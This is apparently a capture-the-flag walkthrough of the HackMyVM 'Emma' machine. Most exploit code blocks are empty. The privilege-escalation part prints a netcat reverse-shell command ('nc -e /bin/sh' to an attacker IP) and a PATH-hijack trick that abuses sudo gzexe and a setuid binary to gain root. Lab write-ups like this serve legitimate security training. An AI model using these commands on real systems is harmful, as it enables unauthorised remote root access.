You’ll find this vm here : https://hackmyvm.eu/machines/machine.php?vm=Emma
Directory scan
Robots.txt
1 |
|
Set up golang
- sudo apt-get install golang
- go get github.com/neex/phuip-fpizdam
- export PATH=$PATH:$(go env GOPATH)/bin
Run the script
Reverse shell
- curl
1 |
|
- listener
1 |
|
Found emma’s ssh credentials
- cat /etc/passwd
1 |
|
-
The database maybe contains important data
-
MySQL root login
1 |
|
Emma ssh login
┌──(alienum㉿kali)-[~]
└─$ ssh emma@10.0.2.171
emma@10.0.2.171's password: 5f******************************
Privileges Escalation
emma@emma:~$ sudo -l
Matching Defaults entries for emma on emma:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User emma may run the following commands on emma:
(ALL : ALL) NOPASSWD: /usr/bin/gzexe
emma@emma:~$ ls
flag.sh user.txt who who.c
emma@emma:~$ ./who
Im
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(emma)
But now Im
uid=1000(emma) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(emma)
emma@emma:~$ stat who
File: who
Size: 16760 Blocks: 40 IO Block: 4096 regular file
Device: 801h/2049d Inode: 146490 Links: 1
Access: (6750/-rwsr-s---) Uid: ( 0/ root) Gid: ( 1000/ emma)
emma@emma:~$ cat who.c
#include <stdio.h>
#include <stdlib.h>
void main(){
setuid(0);
setgid(0);
printf("Im \n");
system("/bin/id");
setuid(1000);
setgid(1000);
printf("But now Im \n");
system("/bin/id");
}
emma@emma:~$ sudo -u root /usr/bin/gzexe /bin/id
/bin/id: 59.2%
emma@emma:~$ cd /tmp
emma@emma:/tmp$ echo "nc -e /bin/sh 10.0.2.15 4444" > gzip
emma@emma:/tmp$ chmod +x gzip
emma@emma:/tmp$ export PATH=/tmp:$PATH
emma@emma:/tmp$ cd
emma@emma:~$ ./who
Im
(UNKNOWN) [10.0.2.15] 4444 (?) : Connection refused
Cannot decompress /usr/bin/id
- listener
┌──(alienum㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.0.2.15] from 10.0.2.171 [10.0.2.171] 43986
id
whoami
root
ls
flag.sh
user.txt
who
who.c
cd /root
ls
flag.sh
root.txt